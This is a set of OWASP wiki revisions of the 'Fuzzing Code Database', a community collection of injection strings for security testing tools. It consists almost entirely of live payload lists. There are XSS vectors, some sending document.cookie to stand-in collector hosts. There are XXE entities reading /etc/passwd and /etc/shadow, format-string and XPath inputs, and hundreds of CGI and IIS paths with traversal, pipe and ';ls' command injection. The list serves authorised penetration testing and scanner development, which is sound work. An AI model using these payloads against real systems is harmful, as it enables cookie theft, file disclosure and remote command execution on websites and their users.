"&lt;SCRIPT a=`&gt;` SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT a=""&gt;'&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT&gt;document.write(""&lt;SCRI"");&lt;/SCRIPT&gt;PT SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;A HREF=""http://66.102.7.147/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://1113982867/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://0x42.0x0000066.0x7.0x93/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://0102.0146.0007.00000223/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""h\ntt\tp://6"<br />
"&lt;A HREF=""//www.google.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""//google""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://google.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://www.google.com./""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""javascript:document.location='http://www.google.com/'""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://www.gohttp://www.google.com/ogle.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;div onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;input type=""image"" dynsrc=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;bgsound src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&amp;{document.write(""XSS-XSS-XSS"");};"<br />
"&lt;img src=&amp;{document.write(""XSS-XSS-XSS"");};&gt;"<br />
"&lt;link rel=""stylesheet"" href=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;iframe src=""vbscript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""livescript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;a href=""about:&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;""&gt;"<br />
"&lt;meta http-equiv=""refresh"" content=""0;url=javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;body onload=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div style=""background-image: url(javascript:document.write(""XSS-XSS-XSS""););""&gt;"<br />
"&lt;div style=""behaviour: url([link to code]);""&gt;"<br />
"&lt;div style=""binding: url([link to code]);""&gt;"<br />
"&lt;div style=""width: expression(document.write(""XSS-XSS-XSS""););""&gt;"<br />
"&lt;style type=""text/javascript""&gt;document.write(""XSS-XSS-XSS"");&lt;/style&gt;"<br />
"&lt;object classid=""clsid:..."" codebase=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;style&gt;&lt;!--&lt;/style&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");//--&gt;&lt;/script&gt;"<br />
"&lt;![CDATA[&lt;!--]]&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");//--&gt;&lt;/script&gt;"<br />
"&lt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;"<br />
"&lt;img src=""blah""onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""blah&gt;"" onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div datafld=""b"" dataformatas=""html"" datasrc=""#X""&gt;&lt;/div&gt;"<br />
"&lt;a href=""javascript#document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img dynsrc=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&amp;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;"<br />
"&lt;img src=""mocha:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div style=""binding: url([link to code]);""&gt; [Mozilla]"<br />
"&lt;!-- -- --&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;&lt;!-- -- --&gt;"<br />
"&lt;xml src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;xml id=""X""&gt;&lt;a&gt;&lt;b&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;;&lt;/b&gt;&lt;/a&gt;&lt;/xml&gt;"<br />
"[\xC0][\xBC]script&gt;document.write(""XSS-XSS-XSS"");[\xC0][\xBC]/script&gt;"<br />
&gt;&lt;script&gt;<br />
"&lt;script&gt;alert(""WXSS"")&lt;/script&gt;"<br />
"&lt;&lt;script&gt;alert(""WXSS"");//&lt;&lt;/script&gt;"<br />
&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br />
'&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br />
'&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;<br />
"%3cscript%3ealert(""WXSS"");%3c/script%3e"<br />
%3cscript%3ealert(document.cookie);%3c%2fscript%3e<br />
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E<br />
&amp;ltscript&amp;gtalert(document.cookie);&lt;/script&gt;<br />
&amp;ltscript&amp;gtalert(document.cookie);&amp;ltscript&amp;gtalert<br />
&lt;xss&gt;&lt;script&gt;alert('WXSS')&lt;/script&gt;&lt;/vulnerable&gt;<br />
&lt;IMG%20SRC='javascript:alert(document.cookie)'&gt;<br />
"&lt;IMG%20SRC=""javascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""javascript:alert('WXSS')"""<br />
&lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&gt;<br />
&lt;IMG%20SRC=javascript:alert("WXSS")&gt;<br />
"&lt;IMG%20SRC=`javascript:alert(""'WXSS'"")`&gt;"<br />
"&lt;IMG%20""""""&gt;&lt;SCRIPT&gt;alert(""WXSS"")&lt;/SCRIPT&gt;""&gt;"<br />
&lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;<br />
&lt;IMG%20SRC='javasc<br />
"&lt;IMG%20SRC=""jav"<br />
"&lt;IMG%20SRC=""jav ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""jav<br />
ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""jav<br />
ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""%20&amp;#14;%20javascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20DYNSRC=""javascript:alert('WXSS')""&gt;"<br />
"&lt;IMG%20LOWSRC=""javascript:alert('WXSS')""&gt;"<br />
&lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&gt;<br />
&lt;IMG%20SRC=javascript:alert('XSS')&gt;<br />
&lt;IMG%20SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;<br />
&lt;IMG%20SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;<br />
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E<br />
"&gt;&lt;script&gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&lt;/script&gt;<br />
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E<br />
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&gt;&lt;/SCRIPT&gt;!--&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;=&amp;{}<br />
'';!--&lt;XSS&gt;=&amp;{()}"<br />
</pre> <br />
<br><br />
<br />
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15) ===<br />
<pre>Statements<br />
count(/child::node())<br />
x' or name()='username' or 'x'='y<br />
&lt;name&gt;','')); phpinfo(); exit;/*&lt;/name&gt;<br />
&lt;![CDATA[&lt;script&gt;var n=0;while(true){n++;}&lt;/script&gt;]]&gt;<br />
&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('XSS');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;foo&gt;&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('XSS');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;foo&gt;&lt;![CDATA[' or 1=1 or ''=']]&gt;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file://c:/boot.ini""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////etc/passwd""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////etc/shadow""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////dev/random""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;xml ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=""javas]]&gt;&lt;![CDATA[cript:alert('XSS');""&gt;]]&gt;"<br />
"&lt;xml ID=""xss""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=""javas&lt;!-- --&gt;cript:alert('XSS')""&gt;&lt;/B&gt;&lt;/I&gt;&lt;/xml&gt;&lt;SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""&gt;&lt;/SPAN&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;xml SRC=""xsstest.xml"" ID=I&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;HTML xmlns:xss&gt;&lt;?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;"<br />
</pre> <br />
=== Format String Statements - (Update: 30 July 2007 - Total Statements: 28) ===<br />
<pre><br />
# Full List<br />
# Format String tests to determine errors in variable handling<br />
# Foobar@email.de<br />
<br />
%s%p%x%d<br />
.1024d<br />
%.2049d<br />
%p%p%p%p<br />
%x%x%x%x<br />
%d%d%d%d<br />
%s%s%s%s<br />
%99999999999s<br />
%08x<br />
%%20d<br />
%%20n<br />
%%20x<br />
%%20s<br />
%s%s%s%s%s%s%s%s%s%s<br />
%p%p%p%p%p%p%p%p%p%p<br />
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%<br />
f(x)=%s x 123<br />
f(x)=%x x 255<br />
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x<br />
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s<br />
XXXXX.%p<br />
XXXXX`perl -e 'print ".%p" x 80'`<br />
`perl -e 'print ".%p" x 80'`%n<br />
%08x.%08x.%08x.%08x.%08x\n<br />
XXX0_%08x.%08x.%08x.%08x.%08x\n<br />
%.16705u%2\$hn<br />
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|<br />
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &gt; /tmp/file; exit;<br />
</pre> <br />
==== Project Contributor ====<br />
<br />
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] <br />
<br />
Reviewer: [[:User:eneves|'''Eduardo Neves''']] <br />
<br />
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] <br />
<br />
==== Feedback and Participation ====<br />
<br />
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org <br />
<br />
==== Project Identification ====<br />
<br />
{{Template:OWASP Project Identification Tab<br />
| project_name = OWASP Fuzzing Code Database<br />
| project_description = <br />
| leader_name = Wagner Elias<br />
| leader_email = <br />
| leader_username = Wagner.elias<br />
| maintainer_name = <br />
| maintainer_email = <br />
| maintainer_username = <br />
| contributor_name1 = <br />
| contributor_email1 = <br />
| contributor_username1 = <br />
| contributor_name2 = <br />
| contributor_email2 = <br />
| contributor_username2 = <br />
| contributor_name3 = <br />
| contributor_email3 = <br />
| contributor_username3 = <br />
| contributor_name4 = <br />
| contributor_email4 = <br />
| contributor_username4 = <br />
| contributor_name5 = <br />
| contributor_email5 = <br />
| contributor_username5 = <br />
| contributor_name6 = <br />
| contributor_email6 = <br />
| contributor_username6 = <br />
| contributor_name7 = <br />
| contributor_email7 = <br />
| contributor_username7 = <br />
| contributor_name8 = <br />
| contributor_email8 = <br />
| contributor_username8 = <br />
| contributor_name9 = <br />
| contributor_email9 = <br />
| contributor_username9 = <br />
| contributor_name10 = <br />
| contributor_email10 = <br />
| contributor_username10 = <br />
| pamphlet_link = <br />
| mailing_list_name = owasp-fuzzing-code-database<br />
| links_url1 = <br />
| links_name1 = <br />
| links_url2 = <br />
| links_name2 = <br />
| links_url3 = <br />
| links_name3 = <br />
| links_url4 = <br />
| links_name4 = <br />
| links_url5 = <br />
| links_name5 = <br />
| links_url6 = <br />
| links_name6 = <br />
| links_url7 = <br />
| links_name7 = <br />
| links_url8 = <br />
| links_name8 = <br />
| links_url9 = <br />
| links_name9 = <br />
| links_url10 = <br />
| links_name10 = <br />
| project_road_map =<br />
| project_health_status = <br />
| current_release_name = <br />
| current_release_date = <br />
| current_release_download_link = <br />
| current_release_rating = <br />
| current_release_leader_name = <br />
| current_release_leader_email = <br />
| current_release_leader_username = <br />
| last_reviewed_release_name = <br />
| last_reviewed_release_date = <br />
| last_reviewed_release_download_link = <br />
| last_reviewed_release_rating = <br />
| last_reviewed_release_leader_name = <br />
| last_reviewed_release_leader_email = <br />
| last_reviewed_release_leader_username = <br />
| old_release_name1 = <br />
| old_release_date1 = <br />
| old_release_download_link1 = <br />
| old_release_name2 = <br />
| old_release_date2 = <br />
| old_release_download_link2 = <br />
| old_release_name3 = <br />
| old_release_date3 = <br />
| old_release_download_link3 = <br />
| old_release_name4 = <br />
| old_release_date4 = <br />
| old_release_download_link4 = <br />
| old_release_name5 = <br />
| old_release_date5 = <br />
| old_release_download_link5 = <br />
}} __NOTOC__ <headertabs /> <br />
<br />
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]</div>
Foobar23
https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&diff=80303
Category:OWASP Fuzzing Code Database
2010-03-22T17:11:02Z
<p>Foobar23: /* Format String Statements - (Update: xx/xx/xx - Total Statements: 28) */ - marked my contribution</p>
<hr />
<div>This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. <br />
<br />
==== News ====<br />
<br />
'''17 March 2010'''<br />
<br />
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)<br />
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)<br />
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)<br />
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)<br />
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)<br />
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)<br />
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)<br />
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)<br />
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)<br />
<br />
'''16 March 2010'''<br />
<br />
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)<br />
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) <br />
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)<br />
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)<br />
<br />
<br />
'''02 February 2010'''<br />
<br />
*Created new Category Lotus/Notes Files<br />
<br />
'''11 August 2009''' <br />
<br />
*Created new Category: XML Attacks<br />
<br />
''Update Statements'' <br />
<br />
*15 new XML Statements <br />
*93 new SQL Injections Statements <br />
*67 new Traversal Directory Statements <br />
*Delete 33 XSS Statement Duplicate <br />
*30 New XSS Statements<br />
<br />
'''7 August 2009''' <br />
<br />
*Updated the objectives of the project.<br />
<br />
'''21 July 2009''' <br />
<br />
*Set the team responsible for the project.<br />
<br />
==== Goals ====<br />
<br />
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. <br />
<br />
In addition, the following functionalities will be included on this project: <br />
<br />
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases <br />
<br />
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: <br />
<br />
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. <br />
<br />
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. <br />
<br />
3 - Possibility to support users on the report of their own experiences with the statements. <br />
<br />
==== Statements ====<br />
<br />
=== Microsoft URLs (18 March 2010) ===<br />
<pre># Interesting IIS Files & Directories (17 March, 2009)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
# Look at the result codes in the headers - 403 likely mean the dir exists, 404 means not. It takes an ISAPI filter for IIS to return 404's for 403s. <br />
# Altetrnatively, slight differences in the number of bytes returned will help differentiate.<br />
<br />
.printer<br />
/%NETHOOD%/<br />
/<script>alert('XSS')</script>.aspx<br />
/Exadmin/<br />
/ExchWeb/<br />
/Exchange/<br />
/Microsoft-Server-ActiveSync/<br />
/OMA/<br />
/OWA/<br />
/Public/<br />
/_layouts/alllibs.htm<br />
/_layouts/settings.htm<br />
/_layouts/userinfo.htm<br />
/_vti_bin/<br />
/_vti_bin/_vti_aut/fp30reg.dll<br />
/_vti_pvt/<br />
/_WEB_INF/<br />
/a%5c.aspx<br />
/adovbs.inc<br />
/aspnet_files/<br />
/certcontrol/<br />
/certenroll/<br />
/certsrv/<br />
/exchange/root.asp<br />
/forum.asp<br />
/forum_arc.asp<br />
/forum_professionnel.asp<br />
/iisadmin/<br />
/iishelp/<br />
/iishelp/iis/misc/default.asp<br />
/iissamples/<br />
/imprimer.asp<br />
/includes/adovbs.inc<br />
/msadc/<br />
/null.htw<br />
/pbserver/pbserver.dll<br />
/postinfo.html<br />
/rubrique.asp<br />
/scripts/<br />
/share/<br />
/tsweb/<br />
/~/<script>alert('XSS')</script>.asp<br />
/~/<script>alert('XSS')</script>.aspx<br />
index.shtml<br />
x.htw<br />
x.ida<br />
x.idq<br />
/citrix/<br />
/citrix/AccessPlatform/auth/<br />
/citrix/AccessPlatform/auth/clientscripts/<br />
/AccessPlatform/auth/clientscripts/<br />
/AccessPlatform/<br />
/AccessPlatform/auth/<br />
/AccessPlatform/auth/clientscripts/cookies.js <br />
/AccessPlatform/auth/clientscripts/login.js <br />
/Citrix//AccessPlatform/auth/clientscripts/cookies.js <br />
/Citrix/AccessPlatform/auth/clientscripts/login.js <br />
/Citrix/PNAgent/config.xml<br />
</pre><br />
<br />
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===<br />
<pre># Vulnerable Cross-Platform CGI (17 March 2010) <br />
# fuzz inside cgi directories<br />
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi<br />
# adam.muntner@quietmove.com<br />
<br />
%2e%2e/abyss.conf<br />
.access<br />
.cobalt<br />
.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('XSS')><br />
.cobalt/alert/service.cgi?service=<script>alert('XSS')</script><br />
.fhp<br />
.htaccess<br />
.htaccess.old<br />
.htaccess.save<br />
.htaccess~<br />
.htpasswd<br />
.nsconfig<br />
.passwd<br />
.www_acl<br />
.wwwacl<br />
/_vti_pvt/doctodep.btr<br />
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
AT-admin.cgi<br />
AT-generate.cgi<br />
Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0<br />
AnyBoard.cgi<br />
AnyForm<br />
AnyForm2<br />
Backup/add-passwd.cgi<br />
C<br />
Count.cgi<br />
DC<br />
DCFORM<br />
File<br />
FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com<br />
FormMail.cgi?<script>alert(\<br />
FormMail.pl<br />
ImageFolio/admin/admin.cgi<br />
LWGate<br />
LWGate.cgi<br />
Upload.pl<br />
Vs<br />
W<br />
YaBB.pl?board=news&action=display&num=../../../../../../../../../..{KNOWNFILE}%00<br />
YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script><br />
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}<br />
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}<br />
add_ftp.cgi<br />
addbanner.cgi<br />
adduser.cgi<br />
admin.cgi<br />
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}<br />
admin.php<br />
admin.php3<br />
admin.pl<br />
adminhot.cgi<br />
adminwww.cgi<br />
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd<br />
aglimpse<br />
aglimpse.cgi<br />
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,<br />
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd<br />
amadmin.pl<br />
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}<br />
ans.pl?p=../../../../../usr/bin/id|&blah<br />
ans/ans.pl?p=../../../../../usr/bin/id|&blah<br />
anyboard.cgi<br />
archie<br />
architext_query.cgi<br />
architext_query.pl<br />
ash<br />
astrocam.cgi<br />
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL<br />
auction/auction.cgi?action=<br />
auctiondeluxe/auction.pl<br />
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}<br />
auth_data/auth_user_file.txt<br />
awl/auctionweaver.pl<br />
awstats.pl<br />
awstats/awstats.pl<br />
ax-admin.cgi<br />
ax.cgi<br />
axs.cgi<br />
badmin.cgi<br />
banner.cgi<br />
bannereditor.cgi<br />
bash<br />
bb-hist?HI<br />
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK<br />
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK<br />
bbs_forum.cgi<br />
betsie/parserl.pl/<script>alert('XSS')</script>;<br />
bigconf.cgi?command=view_textfile&file={KNOWNFILE}&filters=<br />
bizdb1-search.cgi<br />
blog/<br />
blog/mt-check.cgi<br />
blog/mt-load.cgi<br />
blog/mt.cfg<br />
bnbform<br />
bnbform.cgi<br />
book.cgi?action=default&current=|cat%20{KNOWNFILE}|&form_tid=996604045&prev=main.html&list_message_index=10<br />
boozt/admin/index.cgi?section=5&input=1<br />
bsguest.cgi?email=x;ls<br />
bslist.cgi?email=x;ls<br />
build.cgi<br />
bulk/bulk.cgi<br />
c_download.cgi<br />
cached_feed.cgi<br />
cachemgr.cgi<br />
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00<br />
calendar<br />
calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22<br />
calendar.pl<br />
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|<br />
calendar/index.cgi<br />
calendar_admin.pl?config=|cat%20{KNOWNFILE}|<br />
calender_admin.pl<br />
campas?%0acat%0a{KNOWNFILE}%0a<br />
cart.pl<br />
cart.pl?db='<br />
cartmanager.cgi<br />
cbmc/forums.cgi<br />
ccbill-local.cgi?cmd=MENU<br />
ccbill-local.pl?cmd=MENU<br />
cgforum.cgi<br />
cgi-lib.pl<br />
cgicso?query=<script>alert('XSS')</script><br />
cgicso?query=AAA<br />
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00<br />
cgiwrap<br />
cgiwrap/%3Cfont%20color=red%3E<br />
cgiwrap/~@U<br />
cgiwrap/~JUNK(5)<br />
cgiwrap/~root<br />
change-your-password.pl<br />
classified.cgi<br />
classifieds<br />
classifieds.cgi<br />
classifieds/classifieds.cgi<br />
classifieds/index.cgi<br />
clickcount.pl?view=test<br />
clickresponder.pl<br />
code.php<br />
code.php3<br />
com5..........................................................................................................................................................................................................................box<br />
com5.java<br />
com5.pl<br />
commandit.cgi<br />
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html<br />
common.php?f=0&ForumLang=../../../../../../../../../..{KNOWNFILE}<br />
common/listrec.pl<br />
common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|<br />
compatible.cgi<br />
count.cgi<br />
counter-ord<br />
counterbanner<br />
counterbanner-ord<br />
counterfiglet-ord<br />
counterfiglet/nc/<br />
cs<br />
csChatRBox.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csGuestBook.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csLive<br />
csNews.cgi<br />
csNewsPro.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')<br />
csPassword.cgi<br />
csPassword/csPassword.cgi<br />
csh<br />
cstat.pl<br />
cutecast/members/<br />
cvsblame.cgi?file=<script>alert('XSS')</script><br />
cvslog.cgi?file=*&rev=&root=<script>alert('XSS')</script><br />
cvslog.cgi?file=<script>alert('XSS')</script><br />
cvsquery.cgi?branch=<script>alert('XSS')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script><br />
cvsquery.cgi?module=<script>alert('XSS')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week<br />
cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('XSS')</script>&branch=HEAD<br />
dansguardian.pl?DENIEDURL=</a><script>alert('XSS');</script><br />
dasp/fm_shell.asp<br />
data/fetch.php?page=<br />
date<br />
day5datacopier.cgi<br />
day5datanotifier.cgi<br />
db2www/library/document.d2w/show<br />
db4web_c/dbdirname/{KNOWNFILE}<br />
db_manager.cgi<br />
dbman/db.cgi?db=no-db<br />
